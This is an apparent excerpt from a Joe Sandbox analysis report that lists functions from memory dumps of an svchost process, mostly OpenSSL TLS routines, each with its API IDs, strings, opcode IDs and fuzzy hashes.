                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleSleep_errno
                                                                                              • String ID:
                                                                                              • API String ID: 3806203616-0
                                                                                              • Opcode ID: 6a839e314fafbd7497d028076ab11196cdc404032560b441b8063b65648a7ce0
                                                                                              • Instruction ID: 03ddaebe43857b623ab1e550e4093299913edf0f9749a6867346f71a96c3e09c
                                                                                              • Opcode Fuzzy Hash: 6a839e314fafbd7497d028076ab11196cdc404032560b441b8063b65648a7ce0
                                                                                              • Instruction Fuzzy Hash: 1C018CB53C060482FB99AF36ED1036D2765AB56BE8F5812358E2A83790DF3DC891C710
                                                                                              Function 64941A20 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 64941A36
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64941A53
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64941A7A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                              • String ID:
                                                                                              • API String ID: 2978645861-0
                                                                                              • Opcode ID: 57d73889eeb91523de87f080284301cfa8d29add8d7bd3e5f7b6e4a3d255b1d7
                                                                                              • Instruction ID: 2dd914d0eaea0fc0e1107ad45c6fa9da700d638ea0117e3c271b5cb5a1496ee8
                                                                                              • Opcode Fuzzy Hash: 57d73889eeb91523de87f080284301cfa8d29add8d7bd3e5f7b6e4a3d255b1d7
                                                                                              • Instruction Fuzzy Hash: 8E01F72279520983EB194F67FD55319B6959B97BE6F18C2308E0E46390ED3CC4A68300
                                                                                              Function 64946E10 Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCurrentErrorHandleLastOpen_errno
                                                                                              • String ID:
                                                                                              • API String ID: 202612177-0
                                                                                              • Opcode ID: 587258b105657c6678b600fc4fc5aeb211ef1c91ff3197a6972a381e73b22a44
                                                                                              • Instruction ID: d49a8a23e1058b1192e3c43f6f29e1dfd3ea68b05546fdb3f02e8313691cc950
                                                                                              • Opcode Fuzzy Hash: 587258b105657c6678b600fc4fc5aeb211ef1c91ff3197a6972a381e73b22a44
                                                                                              • Instruction Fuzzy Hash: B1F0A76038550187EF0D5F72D8483AF61E79B0EB55F145539CD1A86390EF3DC975C620
                                                                                              Function 00007FFBAB454FC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free_all
                                                                                              • String ID: expect_quic$ssl\quic\quic_impl.c
                                                                                              • API String ID: 310313773-2248945671
                                                                                              • Opcode ID: 15b2d37eae2f8a52fc166bf9abe41406fd35eb0714cc4f03ec213e35d74a03aa
                                                                                              • Instruction ID: ba905e01da82b525362baf53a8aa9565544e608284c9ef933cd07692ad15fecf
                                                                                              • Opcode Fuzzy Hash: 15b2d37eae2f8a52fc166bf9abe41406fd35eb0714cc4f03ec213e35d74a03aa
                                                                                              • Instruction Fuzzy Hash: AC5145B2B0A94152EA16EB36D5617BE6360FB81B80F448132DFAE47776CF2DE8518340
                                                                                              Function 00007FFBAB47EAD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_zallocR_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_psk_kex_modes
                                                                                              • API String ID: 905617597-4063274569
                                                                                              • Opcode ID: 2b3b31fc3803c5442b98ba5a2bc4f271e948038e965265075d1ff68827f78bb6
                                                                                              • Instruction ID: 941a1e792549ca3095dadf6461f2f54fc58782ce62a5be1a09f3f901fcf8b58d
                                                                                              • Opcode Fuzzy Hash: 2b3b31fc3803c5442b98ba5a2bc4f271e948038e965265075d1ff68827f78bb6
                                                                                              • Instruction Fuzzy Hash: E52188B1F5A24342FB66D732E5417B966949F847C0F08C131DE2E876EAEE2CE891D740
                                                                                              Function 00007FFBAB4848C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_use_srtp
                                                                                              • API String ID: 0-4262462768
                                                                                              • Opcode ID: c4a55dc7796a97d0d3bedc18d1a66b86293761fb96297563a579c3614535115c
                                                                                              • Instruction ID: 40eb73ddd806d241d904e48d087f7dd7d2b1d1a11c02bff6c176eb6eb1eecf26
                                                                                              • Opcode Fuzzy Hash: c4a55dc7796a97d0d3bedc18d1a66b86293761fb96297563a579c3614535115c
                                                                                              • Instruction Fuzzy Hash: 7A21A7A1F1A18341FF629B72E5427B91291AF847C0F48C031DE2D87AF6EF2DE8418740
                                                                                              Function 00007FFBAB486700 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_psk_kex_modes
                                                                                              • API String ID: 193678381-1408400335
                                                                                              • Opcode ID: 1664ac46c74a3d6c35e180c5fe07e029471e94f55fe2409f73b2284da7284fa3
                                                                                              • Instruction ID: 36f2b17eb6534895d2e14c1e6f8dda0daa4ce046ba09ee2cfced4ac186754767
                                                                                              • Opcode Fuzzy Hash: 1664ac46c74a3d6c35e180c5fe07e029471e94f55fe2409f73b2284da7284fa3
                                                                                              • Instruction Fuzzy Hash: 6821A4A5E0A38242FBA29FB0D5017B96394EF15748F088530DEED466A9EF3CE684C744
                                                                                              Function 00007FFBAB484170 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_server_cert_type
                                                                                              • API String ID: 0-3789259862
                                                                                              • Opcode ID: 21c3a3a4bb4487e34a21a0d52e51086deb9666c07572ba5d578d7e40614766c1
                                                                                              • Instruction ID: 2eedaf96f9afd895f566ebfbbd253f27c01786b8d508e2a28342ffcb13a0332d
                                                                                              • Opcode Fuzzy Hash: 21c3a3a4bb4487e34a21a0d52e51086deb9666c07572ba5d578d7e40614766c1
                                                                                              • Instruction Fuzzy Hash: A521B3A1F1D18245FB5293B6E1463F912819F457C4F088031EE794BAE7DF2DD486C302
                                                                                              Function 00007FFBAB482C10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_alpn
                                                                                              • API String ID: 0-2562604191
                                                                                              • Opcode ID: e2bb9be5eb591082602a80186975cc9e842cf4bd3fae6847177589c066f45b27
                                                                                              • Instruction ID: a9608d6f37b88b535a60b9228bcba1b27f293bdba0ae5d3b1ace9da9a8319b9f
                                                                                              • Opcode Fuzzy Hash: e2bb9be5eb591082602a80186975cc9e842cf4bd3fae6847177589c066f45b27
                                                                                              • Instruction Fuzzy Hash: 2D2190A1F0964342FB569772F9523BA1240AF547C0F088432EF6D8B7E6EE2CE8918311
                                                                                              Function 00007FFBAB498AEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ossl_statem_server_write_transition$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 0-156501081
                                                                                              • Opcode ID: 22eec64ec76cd787db3ac982d4cd720efbdf4c6106d0429dab9c7dd1a34bf672
                                                                                              • Instruction ID: d8c5a7dd5ba6eb5b98c2d34feaf59eaa7e811831571638f3d01f58d8f9945ff1
                                                                                              • Opcode Fuzzy Hash: 22eec64ec76cd787db3ac982d4cd720efbdf4c6106d0429dab9c7dd1a34bf672
                                                                                              • Instruction Fuzzy Hash: CF1175A2A0A28187E317CB39D4D52BC3B51EB85B54F88C472DF5C877A3CD6CA495C711
                                                                                              Function 00007FFBAB484280 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_server_name
                                                                                              • API String ID: 1390262125-4046455571
                                                                                              • Opcode ID: ac2944453ccd839ccc3cc914e697e592a87e4940b6ca7bc7569bd65b5b45840c
                                                                                              • Instruction ID: 75e83acac98a5361d8ccb6a1d43ceb07606037ada8c72b4b301b66facbfe0095
                                                                                              • Opcode Fuzzy Hash: ac2944453ccd839ccc3cc914e697e592a87e4940b6ca7bc7569bd65b5b45840c
                                                                                              • Instruction Fuzzy Hash: 7011A2A2B1928182EBA6D776E4857FD6391EB447C4F58C431DE2C876B2DF2CD885C700
                                                                                              Function 00007FFBAB47EBF0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_renegotiate
                                                                                              • API String ID: 0-652228395
                                                                                              • Opcode ID: d94eb0b2ecef283a94decfd1885502cad7cdf09c7cb4966c3539a5bb948096a6
                                                                                              • Instruction ID: 6388feee5c019c1eb0974e7b74d3ab6b8afcd6bb175ce4bfa29e1e68a9f92e14
                                                                                              • Opcode Fuzzy Hash: d94eb0b2ecef283a94decfd1885502cad7cdf09c7cb4966c3539a5bb948096a6
                                                                                              • Instruction Fuzzy Hash: D711C4A1F4A24342FB669732F6467F91244AF447C4F048031EE2D4B6E7EE2CE5C18300
                                                                                              Function 00007FFBAB47E0D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_maxfragmentlen
                                                                                              • API String ID: 0-3558564283
                                                                                              • Opcode ID: 32f1fd75370dc0860335a7f32e55792e5b998efdae202afceac39d9a1490f931
                                                                                              • Instruction ID: a316976b9607775b29e26298964c5844ff2863c8a38081f528040e9ae905ae5e
                                                                                              • Opcode Fuzzy Hash: 32f1fd75370dc0860335a7f32e55792e5b998efdae202afceac39d9a1490f931
                                                                                              • Instruction Fuzzy Hash: 2B118FA1B5918241FB529732E9427FA52859F457C0F08C031EE3D8BAE7ED2DE9858B00
                                                                                              Function 64944410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • Error cleaning up spin_keys for thread , xrefs: 6494444A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDebugOutputStringThread_ultoa
                                                                                              • String ID: Error cleaning up spin_keys for thread
                                                                                              • API String ID: 2892977721-2906507043
                                                                                              • Opcode ID: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                                                                                              • Instruction ID: 6273affc26e83ed8f3c49a0d043d27fd3918550a2ad95c3d4e2fd7ba9164ba49
                                                                                              • Opcode Fuzzy Hash: d7c6b92f146a5297dce9a32d46367a64f4f2bdd00a0e22e95ee11bb5d40a8c71
                                                                                              • Instruction Fuzzy Hash: A711086278868082FF258F34E41035A2BE2E74676CF540731DA68467E8DB3DC545CB01
                                                                                              Function 00007FFBAB47E1A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_npn
                                                                                              • API String ID: 1390262125-1587923133
                                                                                              • Opcode ID: 0c87cd5eec68373dc162cae14ffbd167cd557b2670521c11d28808d4a897c9fb
                                                                                              • Instruction ID: 5e950d78fae387a16d1ea286493c451a67b335142878e68c806d6b22316a744d
                                                                                              • Opcode Fuzzy Hash: 0c87cd5eec68373dc162cae14ffbd167cd557b2670521c11d28808d4a897c9fb
                                                                                              • Instruction Fuzzy Hash: 9E11E3A1F5918141FBA69736E5867F91294EB887C0F488131DE2C876F2DE3CDAC5C701
                                                                                              Function 00007FFBAB47E420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_post_handshake_auth
                                                                                              • API String ID: 0-2821314493
                                                                                              • Opcode ID: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                              • Instruction ID: 799ad24adac87a21139fe3b2f1d7e38b0a0abd8b9ab713c16ef1171942cb9caa
                                                                                              • Opcode Fuzzy Hash: bac7bf4fa3fd4e0730eef9842e57bf5e69d3d4d0274f26ca452d69410104372b
                                                                                              • Instruction Fuzzy Hash: 251182A1B1D14242FB629732E5467FD2294AF447C4F448431EF2C8BAE6DE2DD9C58700
                                                                                              Function 00007FFBAB484360 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_session_ticket
                                                                                              • API String ID: 193678381-2390203159
                                                                                              • Opcode ID: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                              • Instruction ID: 102ef2c92e5f0b2b37a74bb51170bd27d9b89ec89e92c48a41e8ef61650bb3dd
                                                                                              • Opcode Fuzzy Hash: 3e759472102663428d332e0c0f1ec7d766e9aceebfea9d6430f504463523da80
                                                                                              • Instruction Fuzzy Hash: D811C6A1F1A14282F791D776F5517FE2250AF447C0F488431DF2C476A7DE2DD8958600
                                                                                              Function 00007FFBAB470260 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ossl_get_max_early_data$ssl\record\rec_layer_s3.c
                                                                                              • API String ID: 193678381-4099276626
                                                                                              • Opcode ID: c6dfb0372a35b94570650d86b783ddb20b63f58534f8dc10c92d57d746d52ad2
